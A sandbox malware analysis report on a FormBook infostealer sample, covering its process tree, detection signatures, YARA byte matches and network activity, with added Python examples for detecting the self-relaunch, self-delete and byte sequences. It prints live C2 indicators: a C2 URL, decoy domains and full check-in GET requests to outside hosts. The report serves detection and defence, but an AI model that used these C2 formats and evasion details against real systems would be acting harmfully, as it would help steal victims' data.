
Analysis Report eQLPRPErea.exe

Overview

General Information

Sample Name: eQLPRPErea.exe
Analysis ID: 383832
MD5: 2c64897aa30694cc768f5ea375157932
SHA1: c897f37780a5237d5c330bcf2668745201b38ff5
SHA256: 18d465a5867ee069480bb9be8eb259be41cc008e487b7b6a3cad14e3559963a9
Tags: exe, Formbook

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • eQLPRPErea.exe (PID: 6876 cmdline: 'C:\Users\user\Desktop\eQLPRPErea.exe' MD5: 2C64897AA30694CC768F5EA375157932)
    • eQLPRPErea.exe (PID: 6956 cmdline: 'C:\Users\user\Desktop\eQLPRPErea.exe' MD5: 2C64897AA30694CC768F5EA375157932)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 4832 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 6616 cmdline: /c del 'C:\Users\user\Desktop\eQLPRPErea.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
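The tree above is the pattern to key detections on: the sample starts a second copy of itself (the process-hollowing and suspended-process signatures), the second copy injects into explorer.exe (which the report lists beneath it for that reason, see the injection signatures), explorer.exe starts the 32-bit system binary wlanext.exe, and wlanext.exe runs cmd.exe /c del to remove the original file. No Sigma rule fired on this run. The Python below is an added example and not part of the Joe Sandbox report: it rebuilds the tree from (pid, ppid, image, command line) records constructed from the Startup list and flags two of those steps, a process whose parent is another instance of the same image, and a cmd.exe whose command line deletes the image of one of its ancestors. The record layout is an assumption; the report prints only "cmd.exe" and "conhost.exe" for the last two images, so those are kept as printed.

```python
"""Added example: flag the self-relaunch and self-delete steps in a
sandbox process tree.  Not part of the Joe Sandbox report; EVENTS is
constructed from the Startup list above."""
import ntpath
import re

# (pid, ppid, image, command line), constructed from the Startup list.
# explorer.exe sits under PID 6956 because the sample injects into it,
# not because 6956 created it.
EVENTS = [
    (6876, None, r"C:\Users\user\Desktop\eQLPRPErea.exe", r"'C:\Users\user\Desktop\eQLPRPErea.exe'"),
    (6956, 6876, r"C:\Users\user\Desktop\eQLPRPErea.exe", r"'C:\Users\user\Desktop\eQLPRPErea.exe'"),
    (3424, 6956, r"C:\Windows\explorer.exe", ""),
    (4832, 3424, r"C:\Windows\SysWOW64\wlanext.exe", r"C:\Windows\SysWOW64\wlanext.exe"),
    (6616, 4832, "cmd.exe", r"/c del 'C:\Users\user\Desktop\eQLPRPErea.exe'"),
    (6648, 6616, r"C:\Windows\system32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# cmd.exe /c del <path>, with or without quotes around the path
DEL_RE = re.compile(r"""/c\s+del\s+['"]?([^'"]+?)['"]?\s*$""", re.IGNORECASE)


def ancestors(by_pid, pid):
    """Walk parent links upward; stops at a missing parent."""
    chain = []
    ppid = by_pid[pid][1]
    while ppid in by_pid:
        chain.append(by_pid[ppid])
        ppid = by_pid[ppid][1]
    return chain


def triage(events):
    """Return (kind, pid, detail) findings for the two patterns."""
    by_pid = {e[0]: e for e in events}
    findings = []
    for pid, ppid, image, cmdline in events:
        parent = by_pid.get(ppid)
        # A process started by another instance of the very same image:
        # the launcher-plus-hollowed-copy pattern the signatures describe.
        if parent and parent[2].lower() == image.lower():
            findings.append(("self_reexec", pid,
                             f"{image} started by pid {parent[0]} ({parent[2]})"))
        # cmd.exe deleting the on-disk image of one of its ancestors.
        if ntpath.basename(image).lower() == "cmd.exe":
            m = DEL_RE.search(cmdline)
            if m:
                target = m.group(1).lower()
                for anc in ancestors(by_pid, pid):
                    if anc[2].lower() == target:
                        findings.append(("self_delete", pid,
                                         f"deletes {target}, the image of ancestor pid {anc[0]}"))
                        break
    return findings


if __name__ == "__main__":
    for kind, pid, detail in triage(EVENTS):
        print(f"{kind:12} pid {pid}: {detail}")
```

On a live host the same two checks map onto Sysmon event 1 (ParentImage/Image/CommandLine); the ancestor walk is what lets the delete check survive the intermediate explorer.exe and wlanext.exe hops.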

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.stone-master.info/aqu2/"], "decoy": ["thesixteenthround.net", "nagoyadoori.xyz", "bipv.company", "imaginus-posters.com", "heliumhubs.com", "baohood.com", "thesahwfam.com", "susanlevinedesign.com", "pdxcontracttracer.com", "shopathamiltons.com", "qcmax.com", "didongthongminh.store", "igotbacon.com", "5915599.com", "seacrestonsietakey.com", "bumiflowers.com", "arcax.info", "lfhis.com", "mlqconsultores.com", "duilian2013.com", "pmrack.com", "zayo.today", "latiina.space", "fitandfierceathletics.com", "printerpartsuk.com", "xn--2021-kmd.com", "shujahumayun.com", "younitygroup.com", "serinelab.com", "infinapisoft.com", "administrativoinform.photos", "all4mortuary.com", "annaschenck.xyz", "christlicheliebe.net", "starr2021.com", "familierafting-aktiviteter.com", "thunderoffroadresort.com", "mex33.info", "serversexposed.com", "chronicbodypaintherapy.com", "billionaireblinggg.com", "permanentmarkertattoo.com", "albestfab.com", "biehnrecords.com", "yesonmeasurec.vote", "bootstrapexpress.com", "howtopreventwaterpollution.com", "fatlosszone4u.com", "hostvngiare.com", "dottproject.com", "appgusher.com", "playfulpainters.com", "gab.expert", "18598853855.com", "bizcebozca.com", "bedpee.com", "militaryhistorytv.com", "teluguc.net", "420vaca.com", "ritarkomondal.com", "autobrehna.com", "happlyending.com", "arcticblastairheat.com", "urbanladder.info"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author (matched strings listed under each row)
00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 further memory-dump matches not shown)

      Unpacked PEs

Source | Rule | Description | Author (matched strings listed under each row)
3.2.eQLPRPErea.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.eQLPRPErea.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.eQLPRPErea.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x158c9:$sqlite3step: 68 34 1C 7B E1
        • 0x159dc:$sqlite3step: 68 34 1C 7B E1
        • 0x158f8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
        • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 further unpacked-PE matches not shown)
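The Formbook_1 strings above are short code byte sequences rather than text: $sequence_0 (03 C8 0F 31 2B C1 89 45 FC) decodes to add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, the timing check that the "RDTSC time measurements" signature refers to, and each of the three JPCERT/CC strings starts with 68, a push imm32 of a constant the rule names after a sqlite3 function. Note also that the offsets in the wlanext.exe dump (0x85f8, 0x146a5, ...) and in 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack are identical, while those in 3.2.eQLPRPErea.exe.400000.0.unpack are lower by a constant 0xE00 for every sequence: the same bytes at a shifted position. The Python below is an added example, not the report's or yara-signator's own code: it searches a buffer for the listed sequences using only the standard library, counts how many distinct sequences are present (the threshold is an assumption, the real rule's condition is not shown on the page), and checks whether two scans differ by a single constant offset. SAMPLE_A and SAMPLE_B are constructed buffers that embed the sequences between filler bytes.

```python
"""Added example: find the yara-signator / JPCERT byte sequences listed
above in a raw dump with the standard library only.  Not the report's
or yara-signator's code; SAMPLE_A / SAMPLE_B are constructed buffers."""
import re

# $sequence_N strings of Formbook_1 as printed above (bytes.fromhex
# tolerates the spaces).  sequence_0 decodes to
# add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax.
SEQUENCES = {
    "sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "sequence_2": "3B 4F 14 73 95 85 C9 74 91",
    "sequence_3": "3C 69 75 44 8B 7D 18 8B 0F",
    "sequence_4": "5D C3 8D 50 7C 80 FA 07",
    "sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
    "sequence_6": "57 89 45 FC 89 45 F4 89 45 F8",
    "sequence_7": "66 89 0C 02 5B 8B E5 5D",
    "sequence_8": "3C 54 74 04 3C 74 75 F4",
    "sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
}
# JPCERT/CC "detect Formbook in memory" strings: each is push imm32 (68 xx xx xx xx)
JPCERT = {
    "sqlite3step": "68 34 1C 7B E1",
    "sqlite3text": "68 38 2A 90 C5",
    "sqlite3blob": "68 53 D8 7F 8C",
}


def scan(buf: bytes, rules: dict) -> dict:
    """Return {name: [offsets]} for every rule string found in buf."""
    return {name: [m.start() for m in re.finditer(re.escape(bytes.fromhex(h)), buf)]
            for name, h in rules.items()}


def matched(hits: dict, minimum: int) -> bool:
    """Count distinct sequences present; the threshold is this example's
    assumption, the real rule's condition is not shown on the page."""
    return sum(1 for offs in hits.values() if offs) >= minimum


def constant_delta(hits_a: dict, hits_b: dict):
    """If every sequence present in both scans moved by the same amount,
    return that delta (same code at a shifted position); else None."""
    deltas = {hits_b[n][0] - hits_a[n][0] for n in hits_a if hits_a[n] and hits_b.get(n)}
    return deltas.pop() if len(deltas) == 1 else None


def _build() -> bytes:
    """Constructed buffer: the sequences separated by NOP filler, with a
    second copy of sequence_0 as in the dumps, then the three pushes."""
    parts = [b"\x00" * 0x40]
    for h in SEQUENCES.values():
        parts += [bytes.fromhex(h), b"\x90" * 7]
    parts.append(bytes.fromhex(SEQUENCES["sequence_0"]))
    for h in JPCERT.values():
        parts += [b"\x90" * 3, bytes.fromhex(h)]
    return b"".join(parts)


SAMPLE_A = _build()
SAMPLE_B = b"\xcc" * 0xE00 + SAMPLE_A    # same bytes shifted by the 0xE00 seen above

if __name__ == "__main__":
    a, b = scan(SAMPLE_A, SEQUENCES), scan(SAMPLE_B, SEQUENCES)
    for name, offs in a.items():
        print(name, [hex(o) for o in offs])
    print("matched:", matched(a, 9), "delta:", hex(constant_delta(a, b)))
```

Run it against a real process dump by replacing SAMPLE_A with the file's bytes; a constant delta between a dump and an unpacked PE, as on this page, tells you the two artefacts carry the same payload body and need only one of them analysed.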

          Sigma Overview

          No Sigma rule has matched

          Signature Overview


          AV Detection:

Antivirus detection for URL or domain
Source: http://www.autobrehna.com/aqu2/?mbyD=wtLrPw5EqSQfBmzZFC+8Ts+SNzTM/uZNWoE4YkZin0I3f7v8IKK2ESUj0jO/FukH5b4y&EhUtvx=xdFt3xAHnXiTPL3p | Avira URL Cloud: Label: malware
Source: http://www.420vaca.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8Y6pPms/JYXhy9shIA4J0qFhxM8TaW5F1yYhRg6zTM8CMz/87KRxOEEOI1BJ9RhXNxF4 | Avira URL Cloud: Label: malware
Source: http://www.playfulpainters.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=K5Kf6zclTLbsCVqtOfN1gGfLaJuyFjl9HZAUKi2taEuEh7VLUYcol1qkdE1d13SuPReH | Avira URL Cloud: Label: malware
Source: http://www.pmrack.com/aqu2/?mbyD=eNunAjC4pU9oqobNMAvEDZJ9lTiY8rojHdPmkqZsRd0+OOiVSsWrKMnHzzNZKvEFUiJI&EhUtvx=xdFt3xAHnXiTPL3p | Avira URL Cloud: Label: malware
Source: http://www.appgusher.com/aqu2/?mbyD=G7QIB1zUm5r+y6hLlZB4xuNK9AxtrOyX5//PKXARlhVXvhDVDTjLo0W6kfT9OEzqeU0h&EhUtvx=xdFt3xAHnXiTPL3p | Avira URL Cloud: Label: malware
Source: http://www.bedpee.com/aqu2/?mbyD=73Z2oBzA8M8lSee00VrNW3/poKkDHXg5S3NVAWTjhm9PWEzsaK72sv0Q0ZTHiNL8Dzyy&EhUtvx=xdFt3xAHnXiTPL3p | Avira URL Cloud: Label: malware
Source: http://www.thesixteenthround.net/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7 | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook (C2 list and decoy domains as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: eQLPRPErea.exe | Virustotal: Detection: 28%
Source: eQLPRPErea.exe | ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 3.2.eQLPRPErea.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.wlanext.exe.8bf110.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.1.eQLPRPErea.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.wlanext.exe.3597960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: eQLPRPErea.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000005.00000002.964029723.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: eQLPRPErea.exe, 00000001.00000003.692305861.000000001ECE0000.00000004.00000001.sdmp, eQLPRPErea.exe, 00000003.00000002.736314312.0000000000B5F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: eQLPRPErea.exe, wlanext.exe
Source: Binary string: wlanext.pdb | source: eQLPRPErea.exe, 00000003.00000002.736943919.00000000026B0000.00000040.00000001.sdmp
Source: Binary string: wlanext.pdbGCTL | source: eQLPRPErea.exe, 00000003.00000002.736943919.00000000026B0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000005.00000002.964029723.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_004026BC FindFirstFileA
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_004162B0 | 4x nop then pop edi
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00415644 | 4x nop then pop edi
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_004162B0 | 4x nop then pop edi
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_008662B0 | 4x nop then pop edi
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00865644 | 4x nop then pop edi

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49734 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49734 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49734 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49737 -> 13.248.216.40:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49737 -> 13.248.216.40:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49737 -> 13.248.216.40:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49758 -> 64.190.62.111:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49758 -> 64.190.62.111:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49758 -> 64.190.62.111:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 91.195.240.94:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 91.195.240.94:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 91.195.240.94:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.stone-master.info/aqu2/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe | DNS query: www.nagoyadoori.xyz
Source: global traffic | HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=Nog7saUMDwoWD2E1asrlCYsF2JarF3pmjxpXcoGpoLe9R6S6cRBIZYNmkdpvudxvP9hF HTTP/1.1 | Host: www.biehnrecords.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /aqu2/?mbyD=73Z2oBzA8M8lSee00VrNW3/poKkDHXg5S3NVAWTjhm9PWEzsaK72sv0Q0ZTHiNL8Dzyy&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 | Host: www.bedpee.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /aqu2/?mbyD=eNunAjC4pU9oqobNMAvEDZJ9lTiY8rojHdPmkqZsRd0+OOiVSsWrKMnHzzNZKvEFUiJI&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 | Host: www.pmrack.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=BTUR3n/6oIRf9T7Z05GVe/Yy9bfPjZd+/OGeJHu++OIAwxof8xfoUtHRcnIR2ViXQlpe HTTP/1.1 | Host: www.serversexposed.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /aqu2/?mbyD=I0+E1VrnC0QGGj/3MDw3ZvYPYqqz6w+SLlQhXTSeWc0xAJh7y/Tkq/xacGspuDOT4pat&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 | Host: www.heliumhubs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8Y6pPms/JYXhy9shIA4J0qFhxM8TaW5F1yYhRg6zTM8CMz/87KRxOEEOI1BJ9RhXNxF4 HTTP/1.1 | Host: www.420vaca.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /aqu2/?mbyD=KqXpoBRkSkhIKFWf0/hcWEBIf2LJNQsM+D3z3wmjuC1NFHENbZKDXJc64HLZauRofodl&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 | Host: www.shujahumayun.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8qPweG0Om7gnfxctK98F/0dsoL0lvZuH4d0zJ/AKmRPMF5KPhADxZAlCqmjmmKP5/AO4 HTTP/1.1 | Host: www.dottproject.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 | Host: www.qcmax.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 | Host: www.qcmax.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=K5Kf6zclTLbsCVqtOfN1gGfLaJuyFjl9HZAUKi2taEuEh7VLUYcol1qkdE1d13SuPReH HTTP/1.1 | Host: www.playfulpainters.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, nothing printable)
